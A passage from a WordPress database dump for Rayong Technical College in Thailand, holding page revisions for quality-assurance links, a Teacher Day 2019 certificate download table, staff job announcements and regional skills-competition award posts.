href=\"/wp-content/uploads/2018/06/คู่มือการประเมินสถานศึกษาอาชีวศึกษาพระราชทาน.pdf\">คู่มือการประเมินสถานศึกษาอาชีวศึกษา เพื่อรับรางวัลพระราชทาน</a></h3>\r\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%84%E0%B8%A7%E0%B8%B2%E0%B8%A1%E0%B8%AA%E0%B8%B3%E0%B8%84%E0%B8%B1%E0%B8%8D%E0%B8%82%E0%B8%AD%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B9%80%E0%B8%A1%E0%B8%B4%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%AA%E0%B8%96%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2%E0%B9%82%E0%B8%94%E0%B8%A2%E0%B8%95%E0%B9%89%E0%B8%99%20%E0%B8%9C%E0%B8%AD_%E0%B8%AA%E0%B8%B4%E0%B8%A3%E0%B8%B4%E0%B8%A3%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B9%8C.ppt\">ความรู้ด้านการประกันคุณภาพ</a></strong></h3>\r\n<h3><strong><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/%E0%B8%9D%E0%B9%88%E0%B8%B2%E0%B8%A2%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%9C%E0%B8%99%20%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B1%E0%B8%99%E0%B8%84%E0%B8%B8%E0%B8%93%E0%B8%A0%E0%B8%B2%E0%B8%9E/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%83%E0%B8%8A%E0%B9%89%E0%B9%80%E0%B8%81%E0%B9%87%E0%B8%9A%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD.zip\">แบบฟอร์มเครื่องมือที่ใช้เก็บรวบรวมข้อมูล</a></strong></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"/รายงานการประเมินตนเอง-sar\">รายงานการประเมินตนเอง (SAR)</a> </span></h3>\r\n<h3><a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #0000ff;\"><strong>ข้อมูลนักเรียน นักศึกษา</strong></span></a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/มาตรฐานการศึกษาสถานศึก\"><span style=\"color: #0000ff;\">มาตรฐานการศึกษาสถานศึกษา</span></a></h3>\r\n \r\n\r\n ', 'งานประกันคุณภาพและมาตรฐานการศึกษา', '', 'inherit', 'closed', 'closed', '', '1753-revision-v1', '', '', '2019-01-07 15:30:49', '2019-01-07 08:30:49', '', 1753, 'http://www.technicrayong.ac.th/1753-revision-v1/', 0, 'revision', '', 0),
(4925, 1, '2019-01-07 17:25:38', '2019-01-07 10:25:38', '[[\"\\u0e40\\u0e25\\u0e02\\u0e17\\u0e35\\u0e48\",\"\\u0e0a\\u0e37\\u0e48\\u0e2d\",\"\\u0e2a\\u0e01\\u0e38\\u0e25\",\"\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"Link\"],[\"001\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e34\\u0e15\",\"\\u0e1b\\u0e2d\\u0e04\\u0e39\\u0e2a\\u0e38\\u0e27\\u0e23\\u0e23\\u0e13\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/teacher-day\\/test.php?tid=1\\\">Open<\\/a>\"],[\"002\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e34\\u0e0d\\u0e0d\\u0e32\",\"\\u0e08\\u0e33\\u0e40\\u0e19\\u0e35\\u0e22\\u0e23\\u0e1e\\u0e25\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Open<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/teacher-day\\/test.php?tid=2\\\">Open<\\/a>\"],[\"003\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e34\\u0e0a\\u0e31\\u0e22\",\"\\u0e21\\u0e35\\u0e0a\\u0e2d\\u0e1a\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/teacher-day\\/test.php?tid=3\\\">Open<\\/a>Open\"],[\"004\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e08\\u0e31\\u0e01\\u0e23\\u0e01\\u0e24\\u0e29\\u0e13\\u0e4c\",\"\\u0e17\\u0e31\\u0e1a\\u0e17\\u0e34\\u0e21\\u0e17\\u0e2d\\u0e07\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"Op<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/teacher-day\\/test.php?tid=4\\\">Open<\\/a>en\"]]', 'Teacher-Day', 'วันครู', 'inherit', 'closed', 'closed', '', '4910-revision-v1', '', '', '2019-01-07 17:25:38', '2019-01-07 10:25:38', '', 4910, 'http://www.technicrayong.ac.th/4910-revision-v1/', 0, 'revision', '', 0),
(4926, 1, '2019-01-07 17:26:54', '2019-01-07 10:26:54', '[[\"\\u0e40\\u0e25\\u0e02\\u0e17\\u0e35\\u0e48\",\"\\u0e0a\\u0e37\\u0e48\\u0e2d\",\"\\u0e2a\\u0e01\\u0e38\\u0e25\",\"\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e28\\u0e36\\u0e01\\u0e29\\u0e32\",\"Link\"],[\"001\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e34\\u0e15\",\"\\u0e1b\\u0e2d\\u0e04\\u0e39\\u0e2a\\u0e38\\u0e27\\u0e23\\u0e23\\u0e13\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=1\\\">Open<\\/a>\"],[\"002\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e34\\u0e0d\\u0e0d\\u0e32\",\"\\u0e08\\u0e33\\u0e40\\u0e19\\u0e35\\u0e22\\u0e23\\u0e1e\\u0e25\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=2\\\">Open<\\/a>\"],[\"003\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e34\\u0e0a\\u0e31\\u0e22\",\"\\u0e21\\u0e35\\u0e0a\\u0e2d\\u0e1a\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=3\\\">Open<\\/a>\"],[\"004\\/2561\",\"\\u0e19\\u0e32\\u0e22\\u0e08\\u0e31\\u0e01\\u0e23\\u0e01\\u0e24\\u0e29\\u0e13\\u0e4c\",\"\\u0e17\\u0e31\\u0e1a\\u0e17\\u0e34\\u0e21\\u0e17\\u0e2d\\u0e07\",\"\\u0e27\\u0e34\\u0e17\\u0e22\\u0e32\\u0e25\\u0e31\\u0e22\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e23\\u0e30\\u0e22\\u0e2d\\u0e07\",\"<a href=\\\"\\/teacher-day\\/test.php?tid=4\\\">Open<\\/a>\"]]', 'Teacher-Day', 'วันครู', 'inherit', 'closed', 'closed', '', '4910-revision-v1', '', '', '2019-01-07 17:26:54', '2019-01-07 10:26:54', '', 4910, 'http://www.technicrayong.ac.th/4910-revision-v1/', 0, 'revision', '', 0),
(4927, 1, '2019-01-07 17:28:08', '2019-01-07 10:28:08', '<h1><span style=\"color: #0000ff;\">สามารถดาวน์โหลดได้ ตั้งแต่วันที่ 21 มกราคม 2562 เป็นต้นไป</span></h1>\r\nผู้ที่เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562\r\nณ วิทยาลัยเทคนิคระยอง สามารถดาวน์โหลดเกียรติบัตร ได้ตามรายชื่อด้านล่าง\r\nโดยมีขั้นตอน ดังนี้\r\n1. ค้นหารายชื่อของท่าน\r\n2. เมื่อพบรายชื่อแล้ว ให้เปิดดูเกียรติบัตร โดยคลิ๊กที่ ปุ่ม Open\r\n3. เกียรติบัตร จะเป็นไฟล์ PDF ท่านสามารถ สั่งพิมพ์ได้ทันที หรือจะบันทึกไว้ในเครื่องเพื่อสั่งพิมพ์ภายหลังก็ได้\r\n4. การสั่งพิมพ์ ให้ระบุรายละเอียดของการพิมพ์ด้วยว่า พิมพ์พอดีกับกระดาษขนาด A4\r\n5. แนะนำให้พิมพ์กับกระดาษ A4 ชนิดแข็งความหนาตั้งแต่ 150 แกรม ขึ้นไป\r\n\r\n ', 'เกียรติบัตรผู้เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562', '', 'publish', 'closed', 'closed', '', 'teacherday', '', '', '2019-01-16 07:26:14', '2019-01-16 00:26:14', '', 0, 'http://www.technicrayong.ac.th/?page_id=4927', 0, 'page', '', 0),
(4928, 1, '2019-01-07 17:28:08', '2019-01-07 10:28:08', '[table id=4 /]', 'Teacher-Day', '', 'inherit', 'closed', 'closed', '', '4927-revision-v1', '', '', '2019-01-07 17:28:08', '2019-01-07 10:28:08', '', 4927, 'http://www.technicrayong.ac.th/4927-revision-v1/', 0, 'revision', '', 0),
(4930, 1, '2019-01-07 17:38:44', '2019-01-07 10:38:44', 'เกียรติบัตรผู้เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562\r\n[table id=4 /]', 'Teacher-Day', '', 'inherit', 'closed', 'closed', '', '4927-revision-v1', '', '', '2019-01-07 17:38:44', '2019-01-07 10:38:44', '', 4927, 'http://www.technicrayong.ac.th/4927-revision-v1/', 0, 'revision', '', 0),
(4931, 1, '2019-01-07 17:39:47', '2019-01-07 10:39:47', '\r\n[table id=4 /]', 'เกียรติบัตรผู้เข้าร่วมงานวันครู จังหวัดระยอง ปี 2562', '', 'inherit', 'closed', 'closed', '', '4927-revision-v1', '', '', '2019-01-07 17:39:47', '2019-01-07 10:39:47', '', 4927, 'http://www.technicrayong.ac.th/4927-revision-v1/', 0, 'revision', '', 0),
(4932, 3, '2019-01-08 09:16:17', '2019-01-08 02:16:17', '', 'ประกาศ รับสมัครสอบคัดเลือกครูอัตราจ้าง edit', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-9', '', '', '2019-01-08 09:16:17', '2019-01-08 02:16:17', '', 4890, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รับสมัครสอบคัดเลือกครูอัตราจ้าง-edit.pdf', 0, 'attachment', 'application/pdf', 0),
(4933, 3, '2019-01-08 09:16:29', '2019-01-08 02:16:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ตำแหน่ง ครูอัตราจ้าง', '', 'inherit', 'closed', 'closed', '', '4890-revision-v1', '', '', '2019-01-08 09:16:29', '2019-01-08 02:16:29', '', 4890, 'http://www.technicrayong.ac.th/4890-revision-v1/', 0, 'revision', '', 0),
(4934, 3, '2019-01-08 09:27:22', '2019-01-08 02:27:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.728466520862872%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลชนะเลิศอันดับ ๑ \"การบริการอาหารและเครื่องดื่ม Food and Beverage Service\" ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ที่จัดขึ้นระหว่างวันที่ ๑๙-๒๐ ธันวาคม ๒๕๖๑ ณ อาคารปฏิบัติการโรงแรม วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b9%84%e0%b8%94-2', '', '', '2019-01-08 09:27:22', '2019-01-08 02:27:22', '', 0, 'http://www.technicrayong.ac.th/?p=4934', 184, 'post', '', 0),
(4935, 3, '2019-01-08 09:26:54', '2019-01-08 02:26:54', '', '48394437_728467350862789_3656186667015864320_o', '', 'inherit', 'closed', 'closed', '', '48394437_728467350862789_3656186667015864320_o', '', '', '2019-01-08 09:26:54', '2019-01-08 02:26:54', '', 4934, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48394437_728467350862789_3656186667015864320_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4936, 3, '2019-01-08 09:27:22', '2019-01-08 02:27:22', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.728466520862872%26type%3D3&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลชนะเลิศอันดับ ๑ \"การบริการอาหารและเครื่องดื่ม Food and Beverage Service\" ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ที่จัดขึ้นระหว่างวันที่ ๑๙-๒๐ ธันวาคม ๒๕๖๑ ณ อาคารปฏิบัติการโรงแรม วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '4934-revision-v1', '', '', '2019-01-08 09:27:22', '2019-01-08 02:27:22', '', 4934, 'http://www.technicrayong.ac.th/4934-revision-v1/', 0, 'revision', '', 0),
(4937, 3, '2019-01-08 09:33:32', '2019-01-08 02:33:32', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fnon.nut.not%2Fposts%2F2227829510574419&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ ๑ ระดับเหรียญเงิน ทักษะการติดตั้งเครื่องปรับอากาศ ระดับภาค ในการประชุมวิชาการองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย (อวท.) การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน หลักสูตรวิชาชีพระยะสั้น ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ณ อาชีวศึกษาจันทบุรี จังหวัดจันทบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b9%84%e0%b8%94-3', '', '', '2019-01-08 09:33:32', '2019-01-08 02:33:32', '', 0, 'http://www.technicrayong.ac.th/?p=4937', 183, 'post', '', 0),
(4939, 3, '2019-01-08 09:33:14', '2019-01-08 02:33:14', '', '48374988_2227827257241311_7520540842566615040_o', '', 'inherit', 'closed', 'closed', '', '48374988_2227827257241311_7520540842566615040_o', '', '', '2019-01-08 09:33:14', '2019-01-08 02:33:14', '', 4937, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48374988_2227827257241311_7520540842566615040_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4940, 3, '2019-01-08 09:33:32', '2019-01-08 02:33:32', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fnon.nut.not%2Fposts%2F2227829510574419&width=500\" width=\"500\" height=\"745\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลรองชนะเลิศอันดับ ๑ ระดับเหรียญเงิน ทักษะการติดตั้งเครื่องปรับอากาศ ระดับภาค ในการประชุมวิชาการองค์การนักวิชาชีพในอนาคตแห่งประเทศไทย (อวท.) การแข่งขันทักษะวิชาชีพ ทักษะพื้นฐาน หลักสูตรวิชาชีพระยะสั้น ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ณ อาชีวศึกษาจันทบุรี จังหวัดจันทบุรี', '', 'inherit', 'closed', 'closed', '', '4937-revision-v1', '', '', '2019-01-08 09:33:32', '2019-01-08 02:33:32', '', 4937, 'http://www.technicrayong.ac.th/4937-revision-v1/', 0, 'revision', '', 0),
(4941, 3, '2019-01-08 09:52:37', '2019-01-08 02:52:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728854377490753%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลชนะเลิศอันดับ ๑ \"การเขียนโปรแกรมควบคุมด้วยโปรแกรมเมเบิลคอนโทรลเลอร์ PLC\" ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ณ อาคารปฏิบัติการ วิทยาลัยเทคนิคจันทบุรี', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b9%84%e0%b8%94-4', '', '', '2019-01-08 09:52:37', '2019-01-08 02:52:37', '', 0, 'http://www.technicrayong.ac.th/?p=4941', 182, 'post', '', 0),
(4942, 3, '2019-01-08 09:35:34', '2019-01-08 02:35:34', '', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลชนะเลิศอันดับ ๑ \"การเขียนโปรแกรมควบคุมด้วยโปรแกรมเมเบิลคอนโทรลเลอร์ PLC\" ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒ ณ อาคารปฏิบัติการ วิทยาลัยเทคนิคจันทบุรี', '', 'inherit', 'closed', 'closed', '', '4941-revision-v1', '', '', '2019-01-08 09:35:34', '2019-01-08 02:35:34', '', 4941, 'http://www.technicrayong.ac.th/4941-revision-v1/', 0, 'revision', '', 0),
(4943, 3, '2019-01-08 09:52:05', '2019-01-08 02:52:05', '', '48430306_728853917490799_3380259001345245184_o', '', 'inherit', 'closed', 'closed', '', '48430306_728853917490799_3380259001345245184_o', '', '', '2019-01-08 09:52:05', '2019-01-08 02:52:05', '', 4941, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48430306_728853917490799_3380259001345245184_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4944, 3, '2019-01-08 09:52:37', '2019-01-08 02:52:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728854377490753%26id%3D100010985913485&width=500\" width=\"500\" height=\"707\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลชนะเลิศอันดับ ๑ \"การเขียนโปรแกรมควบคุมด้วยโปรแกรมเมเบิลคอนโทรลเลอร์ PLC\" ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ครั้งที่ ๓๐ ประจำปีการศึกษา ๒๕๖๑ ณ อาคารปฏิบัติการ วิทยาลัยเทคนิคจันทบุรี', '', 'inherit', 'closed', 'closed', '', '4941-revision-v1', '', '', '2019-01-08 09:52:37', '2019-01-08 02:52:37', '', 4941, 'http://www.technicrayong.ac.th/4941-revision-v1/', 0, 'revision', '', 0),
(4945, 3, '2019-01-08 10:08:35', '2019-01-08 03:08:35', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728855804157277%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลชนะเลิศ องค์การมาตรฐานดีเด่น ระดับภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา ๒๕๖๑ สถานศึกษาขนาดใหญ่', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b4%e0%b8%97%e0%b8%a2%e0%b8%b2%e0%b8%a5%e0%b8%b1%e0%b8%a2%e0%b9%80%e0%b8%97%e0%b8%84%e0%b8%99%e0%b8%b4%e0%b8%84%e0%b8%a3%e0%b8%b0%e0%b8%a2%e0%b8%ad%e0%b8%87-%e0%b9%84%e0%b8%94-5', '', '', '2019-01-08 10:08:35', '2019-01-08 03:08:35', '', 0, 'http://www.technicrayong.ac.th/?p=4945', 181, 'post', '', 0),
(4946, 3, '2019-01-08 10:01:02', '2019-01-08 03:01:02', '', '48381822_728854897490701_4657304966317211648_o', '', 'inherit', 'closed', 'closed', '', '48381822_728854897490701_4657304966317211648_o', '', '', '2019-01-08 10:01:02', '2019-01-08 03:01:02', '', 4945, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/48381822_728854897490701_4657304966317211648_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4947, 3, '2019-01-08 10:08:35', '2019-01-08 03:08:35', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D728855804157277%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วิทยาลัยเทคนิคระยอง ได้รับรางวัลชนะเลิศ องค์การมาตรฐานดีเด่น ระดับภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา ๒๕๖๑ สถานศึกษาขนาดใหญ่', '', 'inherit', 'closed', 'closed', '', '4945-revision-v1', '', '', '2019-01-08 10:08:35', '2019-01-08 03:08:35', '', 4945, 'http://www.technicrayong.ac.th/4945-revision-v1/', 0, 'revision', '', 0),
(4948, 3, '2019-01-08 10:09:06', '2019-01-08 03:09:06', '', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ', '', 'inherit', 'closed', 'closed', '', '4893-autosave-v1', '', '', '2019-01-08 10:09:06', '2019-01-08 03:09:06', '', 4893, 'http://www.technicrayong.ac.th/4893-autosave-v1/', 0, 'revision', '', 0),
(4949, 3, '2019-01-08 10:09:14', '2019-01-08 03:09:14', '', 'ประกาศ รับสมัครสอบคัดเลือกเจ้าหน้าที่ธุรการ edit', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b1%e0%b8%9a%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b8%aa%e0%b8%ad%e0%b8%9a%e0%b8%84%e0%b8%b1%e0%b8%94%e0%b9%80-10', '', '', '2019-01-08 10:09:14', '2019-01-08 03:09:14', '', 4893, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รับสมัครสอบคัดเลือกเจ้าหน้าที่ธุรการ-edit.pdf', 0, 'attachment', 'application/pdf', 0),
(4950, 3, '2019-01-08 10:09:34', '2019-01-08 03:09:34', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B1%E0%B8%9A%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-edit.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รับสมัครสอบคัดเลือกบุคคลเพื่อเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ', '', 'inherit', 'closed', 'closed', '', '4893-revision-v1', '', '', '2019-01-08 10:09:34', '2019-01-08 03:09:34', '', 4893, 'http://www.technicrayong.ac.th/4893-revision-v1/', 0, 'revision', '', 0),
